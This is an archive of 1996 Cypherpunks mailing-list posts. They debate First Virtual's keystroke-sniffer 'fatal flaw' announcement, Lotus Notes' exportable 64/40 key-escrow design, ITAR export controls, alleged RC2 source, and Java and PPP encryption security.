>encryption. It disguises the fact that a message is actually
>(double) encrypted with PGP.  Attackers have to break the 40 bits
>before they see the PGP encrypted data.  A pecular kind of
>steganography.  (If you leave off the PGP header and trailer, it
>may be hard to determine which 40 bits are the correct
>key.)

Excellent point Bill! Lets not forget that IBM owns Lotus Notes, be
sure to include that in your bashing. They caved in on Lucifer
after all. ;)

Four Bits:

On First Virtuals Sniffer program:

Stick a VISA,MASTERCARD,DISCOVER, or AMERICAN EXPRESS sticker on
the front of a SECURE_ID card   Attack>null
( Security Dynamics is SDTI on NASDAQ ;) )

Six Bits:

_TAKEDOWN_ by Tsutomu Shimomura confirms that Kevin Mitnick used
PGP extensively, and encrypted his drives, expect the TLA's to use
that in their arguments. (Head them off at the Pass!)

A Dollar:

For those who seem to have missed it.

"Vladimir Z. Nuri" <vznuri@netcom.com> = Larry Detweiler

Back to our regular Flamefest......


Brian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQ5nd3sfmVh/uI7xAQFr7AQAjvjOZUEEJKdDmcVVWYFs/L20R3BIJYLC
RhAOAyCh40GGiYzzvB8kHTGnu/iSE9cIp7AP2ifUHf1C9aL2TAQWuwxTROPMCwpX
hSHN+UpJ5Au3YrNGZkMDPDVsGUM5EsWaaWJ2uczG330e3mZR6tBNU/BhfdS58RZy
bLULdZno3nI=
=kccs
-----END PGP SIGNATURE-----
END IBM LOTUS'S GAK'ED MESSAGE----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Tue, 30 Jan 1996 19:33:52 +0800
To: cypherpunks@toad.com
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
Message-ID: <199601301105.GAA10893@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 29 Jan 1996 15:07:46 -0500 (EST), Nathaniel Borenstein wrote:

>[My apologies in advance if you see several copies of this message.  I
>am posting this fairly widely due to the severity and importance of the
>problem described.]

>As you may already have heard via the popular press, First Virtual
>Holdings has developed and demonstrated a program which completely
>undermines the security of every known credit-card encryption mechanism
>for Internet commerce.  This is a very serious matter, and we want to
>make sure that the Internet community is properly informed about the
[..]

All that over keyboard grabbers???

*yawn* This is nothing new at all.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Wed, 31 Jan 1996 06:16:58 +0800
To: cypherpunks@toad.com
Subject: why no FV defenders
Message-ID: <v02130507ad34099a0e42@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



[in response to Ted Anderson <ota+@transarc.com>, who wondered
 why cypherpunks are so unanimous in denouncing FV, when we are
 usually at each other's throats.]

Most of the pile-on can be attributed to the fact that FV does
_not_ really see encryption as part of the solution. Other than bits
of lip service here and there in technical groups, they actively
denounce it when they don't think anyone who knows better is
watching (I've seen it with my own eyes at banking conferences,
etc.)

Their extremely supercilious attitude doesn't help either.

The fact that their commerce model is skewed towards long-settlement,
non-anonymous transactions of extremely soft goods makes them
unsympathetic -- although, say, the Digicash people are just as
condescending and certainly _more_ difficult to deal with on a
business level, they have a product that is more applicable to
transactions cypherpunks are generally concerned with, so they
get pile-ons that are maybe half this size, and usually have some
defenders.

Also, clearly, Digicash and other vendors are involved in producing
cryptographic products, whereas FV is actively involved in spreading
FUD about the abilities of crypto products in general... this
is sort of like advocating cat torture on rec.pets.cats and expressing
amazement at the negative response.

This is not to say that there isn't a problem with the current
state of operating systems, especially PC operating systems, or
to say that crypto is magic dust you can sprinkle & make things
secure but I think there's a general belief here that the ultimate
solution to these problems has a substantial role for cryptography,
and that cryptography can be used even today to reduce risk to
acceptable levels in consumer financial transactions. FV does _not_
believe either of these things, although I'm sure NB will pay some
lip-services on the "eventually" score.


------                                                             ------
Douglas Barnes         "The tighter you close your fist, Governor Tarkin,
cman@communities.com    the more systems will slip through your fingers."
cman@best.com                                             --Princess Leia






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Wed, 31 Jan 1996 06:55:15 +0800
To: David Van Wie <dvw@hamachi.epr.com>
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credi t Cards
In-Reply-To: <310D4CCE@hamachi>
Message-ID: <199601301907.LAA29485@chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



> This announcement describes a rather sophisticated technology that   
> delivers nthe same information that any retail clerk can capture today.   
>  Using stolen credit card numbers is a risky business, and the ability of   
> the credit card companies in detecting fraud and locating criminals is   
> quite real.

Retail clerks are not lone bandits.  Retail clerks are employees of
companies which have a strong interest in keeping their reputation
squeaky clean (or risk losing business and welcoming lawsuits).  Yes,
there is no absolute guarantee that clerks will not do something bad
anyway, but there is some self-regulation in that scenario because
someone involved has a strong investment in the community.

A lone bandit writing difficult to detect viruses scamming for credit
card numbers all over the net does not have the strong investment in
the community to preserve or protect.

You wouldn't give your credit card to some random punk on the street,
would you?  However, you have no trouble giving it to a reputable
store.  Why?  For exactly the same reason.

> Of course, since Federal law requires the credit card companies, not the   
> user, to pay the costs of fraud, First Virtual's entire premise is a red   
> herring.  If the credit card companies are willing to take the risk, they   
> will (and are).

Federal law does not require that a company stay in business once it
has entered the banking market.  If the risks are too high for them
to make a profit, they will fold.  If they are smart enough to see
the writing on the wall, they will pack up and move elsewhere in the
market.

Ern






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charlie_Kaufman/Iris.IRIS@iris.com
Date: Wed, 31 Jan 1996 03:03:21 +0800
To: CypherPunks@toad.com
Subject: Re: Lotus Notes
Message-ID: <9601301936.AA0336@moe.iris.com>
MIME-Version: 1.0
Content-Type: text/plain


My previous posting seems to have been truncated (at least by the time it got 
back to me - please forgive me if it's a duplicate). The following is the 
attachment that should have been there...

 --Charlie Kaufman
 (charlie_kaufman@iris.com)
 PGP fingerprint: 29 6F 4B E2 56 FF 36 2F   AB 49 DF DF B9 4C BE E1

p.s. re: the fact that it's 64 bits rather than 128. That was the limit on key 
size of the crypto software we licensed from a third party. That crypto 
software also limited us to 760 bit RSA keys. We intend to push those numbers 
up in the future in the domestic version, but have some real world issues 
around backwards compatibility with our installed base. I don't know whether we 
will be allowed to go over 64 bits in the exportable version; since we couldn't 
do it anyway, there was no point in pushing this round.


Lotus Backgrounder


Differential Workfactor Cryptography


Abstract: This document describes the technical approach behind the 
exportable strong cryptography included in Lotus Notes Release 4 
(International Edition). Current U.S. export regulations generally 
prohibit the export of cryptographic software that uses keys larger than 
40 bits, but advances in processor technology make 40 bit keys breakable 
by exhaustive search practical for a growing collection of potential 
attackers. In a novel scheme we sometimes refer to as 64/40, we provide 
the cryptographic strength of 64 bit keys against most attackers while to 
comply with export regulations we make the workfactor for breaking the 
system equivalent to only 40 bits for the U.S. government. We do that by 
encrypting 24 of the 64 bits under a public RSA key provided by the U.S. 
government and binding the encrypted partial key to the encrypted data.

Background: As we,re all painfully aware, the U.S. government continues 
to maintain that cryptography should be classified and controlled as a 
munition of war. There is a long historical basis for this - some of 
cryptography,s finest hours have been during the wars of the past. And 
while some would argue that export controls are a sham because many 
foreign governments impose no such restrictions and we participate in an 
international marketplace, by one very important measure export controls 
have been a success: no mass-deployed worldwide cryptography has emerged 
and most general communications is still in cleartext.

But while the government has been successfully defending its ability to 
spy, trouble has been brewing. Criminals don,t recognise borders -- 
there,s only one wild and wooly network. Crackers are able to attack 
targets halfway around the world with no fear of prosecution. Smart people 
in Eastern Europe crack financial systems in New York. Everywhere you 
look, bright clever people are breaking into communication systems, 
industrial control systems, transportation systems, health care systems, 
anything and everything that,s controlled by networked computers. This is 
not a theoretical problem, or just a problem with clever people stealing 
money from banks; it,s a clear and present danger that,s a direct result 
of the fact that we,ve moved into the information age without adequately 
securing our global information systems.

Lotus Notes has been a pioneer in providing transparent strong RSA-based 
cryptography in its product offering. It went to great lengths to provide 
the strongest protection legally permissable. There is an International 
Edition that complies with export regulations and a domestic edition that 
does not (called the North American Edition because it is legally 
available in the U.S. and Canada). In the International Edition, users use 
two RSA key pairs -- one used to protect data integrity and authentication 
and another (shorter) one to protect data confidentiality because only 
data confidentiality key sizes are regulated by export controls. Full 
interoperability between the North American and International Editions is 
achieved by having the two ends negotiate down to the largest key size 
that both ends support. This design came at no small cost, but it was the 
only way we could deliver the best security possible to each of our 
customers given the existing regulatory climate.

Differential Workfactor Cryptography is another innovation in the 
direction of giving our customers the best security possible. At the same 
time, we continue to oppose the regulations that make the complexity 
necessary.

How it works: The idea behind Differential Workfactor Cryptography is 
simple; whenever a bulk data key is created, a 64 bit random number is 
chosen. If the use of that key is one involving data confidentiality and 
the International Edition of Notes, 24 of the bits are encrypted under a 
public RSA key that was provided to us by the U.S. government and the 
result - called a Workfactor Reduction Field - is bound into the encrypted 
data. There is no Workfactor Reduction Field in data used only by the 
North American Edition of Notes, and there is none for keys that are not 
used for data confidentiality (e.g. those used for authentication).

If an attacker wanted to break into a Notes system based on information 
obtained by eavesdropping, he would have to exhaustively search a 64 bit 
key space. Even the U.S. government would face this workfactor because 
there is no Workfactor Reduction Field in keys used for authentication. An 
attacker who wanted to read an encrypted document that was either read 
from a server or eavesdropped from the wire would face a 64 bit 
workfactor. But if the U.S. government needed to decrypt such a document, 
it could obtain 24 of the bits using its private key and the Workfactor 
Reduction Field and then exhaustively search a 40 bit key space.

Tamper resistance: You might wonder what,s to prevent someone from 
deleting the Workfactor Reduction Field from a document or the setup 
protocol of a network connection. This is similar to the problem faced in 
the Clipper design to assure that the LEAF field was not removed from a 
conversation. In a software-only implementation, it is not possible to 
prevent tampering entirely. The best a software implementation can do in 
terms of tamper resistance is to make it impossible to remove the 
Workfactor Reduction Field without modifying both the source of the data 
and the destination. This can be done by having the destination check for 
the presence of the Workfactor Reduction Field and refuse to decrypt the 
data if it is not there or not correct. The destination can,t decrypt the 
Workfactor Reduction Field to check it, but knowing the bulk data key and 
the government public key, it can regenerate the WRF and compare the 
result with the supplied value. RSA has the convenient property that the 
same value encrypted twice produces the same result. It would be somewhat 
more complex (but still possible) to duplicate this functionality with 
other public key algorithms. [Note: for this to work, the random pad that 
was used in creating the WRF must be delivered to the recipient of the 
message. For it to be secure, it must be delivered encrypted since a 
clever attacker who knew the pad could do 2^24 trial encryptions to get 24 
bits of the key and then do 2^40 trial decryptions to recover the rest.]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Wed, 31 Jan 1996 02:36:20 +0800
To: ses@tipper.oit.unc.edu>
Subject: Re: short FV question
In-Reply-To: <Pine.SOL.3.91.960129224705.8055B-100000@chivalry>
Message-ID: <wl3YDiqMc50eRIr7tQ@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from junk.interesting: 29-Jan-96 short FV question Simon
Spero@tipper.oit.u (211*)

> When my CTS plays up like it has this past week, I use a Dragon dictate 
> Voice Recognition system. Since I' Not actually touching a keyboard, does 
> this make me secure?

I don't *think* so.  As I understand it, Dragon Dictate works by feeding
things into the keyboard queue.   -- Nathaniel
--------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjs@netcom.com (cjs)
Date: Wed, 31 Jan 1996 07:18:01 +0800
To: cypherpunks@toad.com
Subject: ANNOUNCE: Experts Predict End Of Secure Communications (makes FV's announcement look pretty silly too)
Message-ID: <199601301916.LAA28992@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



	     EXPERTS PREDICT END OF SECURE COMMUNICATIONS


(East Bumbleton, Arkansaw) Experts from Really Neat Idea Labs have
predicted the end of secure communications on the internet. The firm
today announced that anyone watching another person enter a credit
card on a computer could possibly get that person's credit card
number. A spokesperson for RNI Labs said, "Wow man! This is like an
incredible discovery, man. If you can like see someone entering their
card number then you can like look at what keys they push and like get
their number and like charge stuff to them. There is like no hardware
or software on earth that can like prevent it." The spokesperson went
on to say that the reprocussions of their discovery could lead to
world-wide economic chaos, a rebirth of the third reich, and the 27th
coming of Jesus Christ.

In a related story, retired talk-show host Johnny Carson is under
federal investigation. An anonymous tipster told authorities that
Mr. Carson has been using his "Amazing Karmack" hat to guess the
credit card numbers of newly mailed cards. Mr. Carson could not be
reached for comment.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 31 Jan 1996 07:08:23 +0800
To: blanc <blancw@accessone.com>
Subject: Re: more RANTING about NSA-friendly cpunks
In-Reply-To: <01BAEEB4.B4C45680@blancw.accessone.com>
Message-ID: <199601301928.LAA02905@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


[the NSA]
>is sufficiently well-funded where they can concentrate on pursuing their =
>case against a target, a company or individual is engaged in creating =
>their income at the same time that they must also use a portion of these =
>resources to defend themselves in court (as well as defend their public =
>image).  =20

@$%^&*
I cannot believe how my simple message is being warped out of all 
recognition. I said some very specific things, and it seems that everyone
reads their own fears into what I write. well, that is the nature of
fear I have been pointing out-- only loosely related to reality. I 
reiterate to you:

1. I am NOT advocating that lone individuals defy the ITAR per se. if you
recall, I was lamenting that no CORPORATIONS so far have the balls
to challenge the ITAR (such as MS, Netscape etc.). these companies
already have large legal departments and strong experience fighting
the government on other issues. yet when it comes to taking an offensive
stance rather than a defensive one, they cower in the shadows.

what *really* exasperated me was the idea that if MS even "signs" outside
crypto packages, they would be "prohibited" from "exporting" these
signatures. this is OUTRAGEOUS and no rational person would submit to
such imbecility. I lose *extreme* amounts of respect for *anyone* who
either submits or even rationalizes this supposed system?

the above is tantamount to LETTING THE NSA MAKE LAWS ANY TIME THEY WANT.
are there any laws on the books that talk about signing foreign packages?
OF COURSE NOT. and if they were, THEY SHOULD BE GOTTEN RID OF IMMEDIATELY.

the NSA has NO LAWMAKING AUTHORITY WHATSOEVER. but the cryptographic 
community is VOLUNTARILY GIVING THEM THAT POWER because of Fear, 
Uncertainty, Doubt.

2.  I pointed out that even if individuals DO challenge the ITAR, they
are NOT LIKELY TO BE LEFT ALONE. witness Bernstein getting support from
EFF, etc.  there are a lot of lawers and interests that are just
DYING for an opportunity to fight the ITAR in court. I mean, haven't you
ever seen those lists of companies that sign letters against the ITAR?
can you imagine them contributing only a tiny fraction of their legal
departments to a genuine case? this was another of my strong points:
the idea that it is a lone struggle against the ITAR for anyone is
*not*correct*. it is demonstrably false based on the number of companies
and organizations such as EFF that have vociferously voiced opposition.

3. you assume that ignoring the ITAR leads to prosecution. THERE IS
NO PROOF OF THIS. this is the main point of my writing. what if writing
crypto to heart's content, even for individuals, leads to no prosecution?
then your entire blah-blah-blah article about the court system and how
the poor individual is powerless to use it is POINTLESS. that has been
my main point: it is possible that individuals will NEVER be prosecuted
under the ITAR crypto sections. all the boneheads are suggesting that
"oh, Zimmermann is just an anomaly. they will really get the *next*
guy". but when does your imagination end? your own imagination is what
is determining your reality, not the reality! if Zimmermann isn't prosecuted,
nor anyone associated with him, WHO IS GOING TO BE PROSECUTED?

>
>It would be a noble project to challenge something like the ITAR in a =
>court of law, where the issues and flaws of the government's attitudes & =
>methods could be brought out in detail, dashed to the ground by =
>brilliant reasoning and argument, winning a battle not only for privacy, =
>but for the lofty goal of individual sovereignty.   But it would take a =
>lot of time, some very able talents, and a lot of cash; most lone =
>cryptographers would not be able to do these two things at once (making =
>a living while also fighting the dragon).

I reiterate: no where in my ranting did I suggest a lone person challenge
the ITAR: that is the CYPHERPUNK PREJUDICE that things of significance
are only accomplished by individuals. indeed, this mindset plays *directly*
into the arms of the "enemy", the NSA. remember, defeat is a psychological
aspect as much as a real one. the NSA does not have to win, they only
have to make you think you have *lost*, which is the pervasive feeling on
this list, EVEN AFTER *nothing* happened to Zimmermann!!  "oh, poor 
individual me, who am I to challenge the NSA, they have all the power,
and I am just a lone sheep out in the wilderness"... 

>It's easy for you, Vlad, to chastise others for being cowardly, when you =
>have nothing to lose (and only incendiarism to offer). 

I am not so much "chastising anyone for cowardice". I have not used that
word at all. you introduced it. what I am criticizing is our *attitudes*
that are bringing about the very situations that we supposedly are 
in opposition to. I am criticizing the *fear* that is a strong undercurrent
of all dialogue and sentiments here. cowardice is as much a state of
mind as it is a lack of action. I am not so much criticizing the latter
as the former. I have less problem with people not doing anything, than
with them using FALSE REASONS to justify their inactivity. if you are going
to be a sheep, at least be honest with yourself that you are a sheep!!

 why is it so controversial for me to say, YOUR FEARS
ARE COUNTERPRODUCTIVE TO YOUR OWN AGENDA. why is this so incomprehensible?
I have gotten endless mail from people who don't have a clue, and seem
to continue to insist: OUR FEARS ARE JUSTIFIED. as long as you think that
way, you are *self*defeating*. it is a self-fulfilling prophecy!!

even after NOTHING happens to Zimmermann, the sheep are not comforted,
because the sheep can *never* be comforted, no matter what happens.

 Those who are =
>enjoined to take action must calculate how much they can afford to =
>invest in such an expensive venture.   You asked me in an earlier post =
>how I could distinguish just any poster to the list from someone who =
>might be an "agent provocateur".   By this:  they only provoke action =
>from others - encouraging, cajoling, shaming, pushing them into =
>thoughtless action, without themselves taking on any of the risk =
>involved, without themselves facing any of the dangers but only getting =
>others to do so.

give me a break. perhaps you think that I am trying to stop the spread
of crypto? it would be quite ironic if you dismissed the most effective
approach possible as that coming from an "agent provocateur". but it
would be quite fitting. frankly, I increasingly wonder why I am wasting
my time with sheep.  (your own mindset above reveals your own "people can
only challenge the government alone" prejudice/mindest that is 
self-destructive to the agenda of crypto spread).

of course I am not asking for "thoughtless action". that's ridiculous. I
have been ranting against THOUGHTLESS FEAR which is ENDEMIC on this list.
I have pointed out why there is no proof that fear is justified, but the
sheep will have none of it. fine, just stop sending me email and posting
pretending you are NOT SHEEP.

>It would be great to have a show of fireworks in a court of law.   But =
>(and I don't mean to begin a long thread of discussion on this) I myself =
>would wonder why the Supreme Court wouldn't already be defending us from =
>the attacks against basic ideals like personal privacy. 

because THEY CANNOT DO SO UNTIL A LAW IS CHALLENGED IN COURT!!! @##$%^&*!!!

  There are =
>already in existence a body of "authorities" assigned to the task of =
>preserving the Constitution, educated in Law and the principles for =
>which this nation stands.   They are the ones whom I would address with =
>inquiries over negligence & lilly-livered, yellow-bellied =
>non-involvement.

THAT'S ABSOLUTELY FALSE. they have no power to strike down laws prior
to a challenge. can do NOTHING until a law is CHALLENGED!!
and that's what I'm ADVOCATING!!

  I guess someone has to bring the matter to their =
>attention, bringing up charges of injustice for their wisdom to cogitate =
>upon.  

all I can say is that this sentence seems to bespeak a lack of understanding
of how the supreme court works and how a law is determined to be 
unconstitutional. it suggests you think these justices have some kind
of independent review power over laws, prior to court cases?

as long as you live your life thinking that YOUR FREEDOM is SOMEONE ELSE'S
JOB, you are going to LOSE IT BIGTIME.

 Nevertheless, it is to them, who are in charge of maintaining =
>consistency to the ideals within The Constitution, that I would ask, =
>"why have you forsaken us"?

oh, brother. it is you who have forsaken yourself.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 31 Jan 1996 04:22:07 +0800
To: cypherpunks@toad.com
Subject: Re: Sad state of affairs
Message-ID: <ad339eeb2f0210047d3f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:28 AM 1/30/96, bofur@alpha.c2.org wrote:
>It's a pretty sad statement of how poorly this list is functioning when
>the RC2 source can be publically released but people would rather
>sling mud over glorified keystroke trappers and rant about Nazi deathcamps.
>
>Our friends at the NSA must be pleased with the slow death of this group.
>
>Sadly,
>Bofur.

Well, Bofur, the alleged RC2 code is, at most, "just another cipher."

The issue of the Germans disconnecting from parts of the Net, as a means of
pressuring sites to get material removed, and the bypasses (such as proxies
and mirror sites at CMU, MIT, and Stanford), is just as important, if not
more so.

In any case, Bofur, if you want to talk about RC2, talk about it. Nobody's
stopping you.

--Tim


Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremy Mineweaser <Jeremym@area1s220.residence.gatech.edu>
Date: Wed, 31 Jan 1996 03:05:33 +0800
To: cypherpunks@toad.com
Subject: Re: FV's Borenstein discovers keystroke capture programs!
Message-ID: <2.2.32.19960130163242.0098400c@area1s220.residence.gatech.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 09:53 AM 1/30/96 -0500, nsb@nsb.fv.com wrote:

>> ... likely, you store the card numbers on a computer.  And no doubt,
>> someone or something enters those numbers into a database.
>> You have just violated your own cardinal rule.
>
>Nope, afraid not.  We keep the credit card numbers on a non-Internet
>computer.  

Let me restate your cardinal rule, direct from your "alert":

>Quite simply, we believe that this program
>demonstrates a FATAL flaw in one whole approach to Internet commerce,
>and that the use of software to encrypt credit card numbers can NEVER be
>made safe.  For consumers, we recommend the following simple rule:
>
>NEVER TYPE YOUR CREDIT CARD NUMBER INTO A COMPUTER.

How about we here it again, just because it's so well thought out:

>NEVER TYPE YOUR CREDIT CARD NUMBER INTO A COMPUTER.

Now, the fact that your customer database of credit card numbers
is not directly available via the Internet does not make it cease to
be a computer.  Regardless of its networkability, it is still a computer.
Do you suggest, then, that computers cannot exist without networks?

>As to how the credit card numbers are entered:  they are entered at
>account setup time via a telephone call.  

And just *where* do they get entered?   Into a computer.
And *how* are they entered?  Via a keyboard.

What was that?  You guys enter credit card numbers via the
keyboard?  But YOU CAN'T DO THAT!  IT'S NOT SAFE!

If I can't trust myself to keep my credit card number secure, why
should I trust your minimum-wage data entry employees?

>Believe me, we've thought a LOT about this.

I believe that you thought more about writing your glorified keyboard
sniffer than you did deciding how to announce your discovery to the public.
---
   Jeremy Mineweaser     | GCS/E d->-- s:- a--- C++(+++)$ ULC++(++++)>$ P+>++$
 j.mineweaser@ieee.org   | L+>++ E-(---)  W++ N+  !o-- K+>++  w+(++++) O-  M--
                         | V-(--) PS+(--) PE++ Y++>$ PGP++>+++$ t+() 5 X+ R+()
    *ai*vr*vx*crypto*    | tv(+)  b++>+++ DI+(++)  D+  G++ e>+++  h-() r-@ !y-





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 31 Jan 1996 07:18:26 +0800
To: Alexandra Griffin <cypherpunks@toad.com
Subject: Re: PPP link encryption?
Message-ID: <199601301931.LAA02253@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  6:36 AM 1/30/96 -0500, Alexandra Griffin wrote:
>Is there any software out there on the net for doing real-time,
>transparent encryption of a PPP link?
>...
>Finally, could someone make a ballpark estimate as to the amount of
>additional latency that would be added?

Ballpark estimate:  If the encryptor receives a complete packet before
encrypting and forwarding it then there would be an additional
packetSize/byteRate + encryptionTime seconds added to the packet's transit
time.

If the encryptor encrypts "on the fly", passing the bits of a packet as
their are received, then it would add almost no latency.  However, the
encryption algorithms would be limited to stream cyphers, which have
security and error recovery implications.  See "Applied Cryptography" for
details.


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 31 Jan 1996 09:17:34 +0800
To: br@scndprsn.eng.sun.com (Benjamin Renaud)
Subject: Re: FL Demonstrates Fatal Flaw in Logins
Message-ID: <199601301931.LAA02257@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  8:49 AM 1/30/96 -0500, Perry E. Metzger wrote:
>Benjamin Renaud writes:
>> The only events a Java applet is privy to are those that are typed in
>> an applet window (and only those it itself spawned).
>
>Don't say "is privy". Say "is supposed to be privy". Doubtless bugs
>will appear in java security in the future -- they've shown up in the
>past.

My bigest worry about Java security is the size of its "security kernel". 
Having a small, well defined, security kernel is a big advantage.  All the
better if the source is available for public review.  Java has a large, and
to me somewhat undefined "security kernel".

(BTW - I havn't been able to find on the web pages the kind of overview of
the libraries which would make the detailed method descriptions make sense.
 Perhaps I havn't looked in the right place.)


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Wed, 31 Jan 1996 07:43:00 +0800
To: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
In-Reply-To: <ad32cd9601021004af4e@[132.162.233.188]>
Message-ID: <199601301936.LAA01260@chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



> This is the first net distributed "security alert" distributed that
> I've noticed, with almost no real content.  No one who knows a bit about
> computer security learned anything they didn't already know from that
> "alert".  Rather, it was distributed in the _form_ of a CERT-like alert,

This sort of remark is just uncalled for.  The point NSB made in his
message was precisely that the average person does NOT know anything
about computer security.

While his alert is not necessarily designed for the audience on this
list, it is worth paying attention to because it brings up issues
which this list has had to deal with many times in the past.  One
classic example is usability of PGP.  If PGP is so good for the
masses, why aren't they just flocking to it.  The problem is that it
is more than just point and click.  User interfaces designed for the
masses go through endless hours of reviews dealing with "one click
or two" issues.  We can up the snobbery level and say, "if you
cannot take the time to protect your E-mail, then you deserve to
have your mail spied upon."

But I was under the impression that cypherpunks are supposed to lead
the way, not cut loose and run.

Ern






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Wed, 31 Jan 1996 07:42:07 +0800
To: cypherpunks@toad.com
Subject: Re: Alleged RC2
In-Reply-To: <9601301829.AA11121@alpha>
Message-ID: <199601301943.LAA05677@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Mike McNally writes:

> Any ideas on whether the comment in the source about the "effective
> key length" trick being an export control deal is true?

It sounds plausable.

> If there were a known version of this floating around known to have a
> 40-bit restriction, is it likely that the restriction would be done by
> always supplying "40" as the "bits" parameter, or would be it by
> simply limiting the user key length?

The "bits" parameter guarantees that there are exactly 2^bits
distinct possibilities for the key schedule.  It does this by
re-calculating the key schedule as a function only of its
rightmost "bits" bits, after expansion of the user key to 
128 bytes.

One would not wish to directly limit the length of the user
key, since it would most likely be a passphrase of some sort. 

The "bits" parameter allows the effective key length to be
set in a manner which is translucent to the application and
its user interface. 

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Wed, 31 Jan 1996 03:20:21 +0800
To: David Mazieres <dm@amsterdam.lcs.mit.edu>
Subject: Re: CONTEST: Name That Program!
In-Reply-To: <sl3GafqMc50eQWYD0N@nsb.fv.com>
Message-ID: <0l3YgACMc50eRIr=Nb@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 30-Jan-96 Re: CONTEST: Name That Pro.. David
Mazieres@amsterdam (1274)

> You are a liar.

And you have terrible manners.  

> Your program does not undermine all known schemes for transmitting
> software-encrypted credit cards on the internet.  You have no way of
> obtaining my credit card number, because I will not run your software.

Guess what?  I don't care whether or not I can get onto your machine,
because I undermine the overall scheme statistically.  That's because if
I were a criminal, I would be perfectly sanguine about the fact that the
average consumer doesn't have a clue how to protect himself from
untrusted programs such as this.  In fact, I'd settle for getting onto
10% of the machines, although I suspect I could get onto more like 80%
without raising a sweat.  Yes, David, your personal credit card is safe,
because you're a cypherpunk wizard.  For that matter, mine is safe too. 
But Grandma's isn't.

> Furthermore, because I use a Unix-like operating system (specifically
> OpenBSD) which I re-build from source code every week or so, you would
> need to hack my compiler to keep mis-compiling itself and compromise
> my kernel or netstat, ps, etc, for which you would need to be root.

Case closed.  Your argument would hold a lot more weight if you could
convince me that the average Internet consumer was going to rebuild his
UNIX kernel every few weeks.  Internet commerce is targeting the masses
of people for whom "cut and paste" is still a technical term.

> The first virtual protocol seems to have some real weeknesses.
> However, I do not feel like wading through all the pages of text to
> figure out what is going on.  I challenge you to post a concise
> description of the protocol, using syntax such as:

>   A -> B:  {ID, xxx, ...}_Ks

> With short descriptions where necessary.  If you do, I'm sure we can
> rip your protocol to shreds (which is why you won't).

This is one of the most outrageous statements I can imagine.  Our
protocols have been published, both in summary and in excruciating
detail, for over a year.  They've been scrutinized by all sorts of
people in the financial industry, most of whom immediately turned around
and asked if we were looking for investors.  Just because you're too
lazy to read them (or probably even to go to our web site to look at
them), you assume that you can rip them to shreds.  I'm very impressed. 
Here's an equally meaningful counterclaim:  "I've never met you in
person and have no idea what you look like, but I'm sure that I'm better
looking than you are."  (And for the record, because our security isn't
based on mathematical/cryptographic assurances, but rather on systemic
checks and balances, mathematical notation is pretty darned useless.)

But anyway, there's no need for you to stop being lazy in order to "rip
them to shreds".  We are happy to tell you (in
http://www.fv.com/pubdocs/fv-austin.txt) EXACTLY how to break our
security, and why the kind of attack to which we are vulnerable doesn't
matter nearly as much as the vulnerability we've exposed in the software
encryption of credit cards.  What we're trying to do, with our most
recent announcements, is hold the competing systems to the same standard
of full-disclosure-of-risks that we've held ourselves to all along. - -
Nathaniel
--------
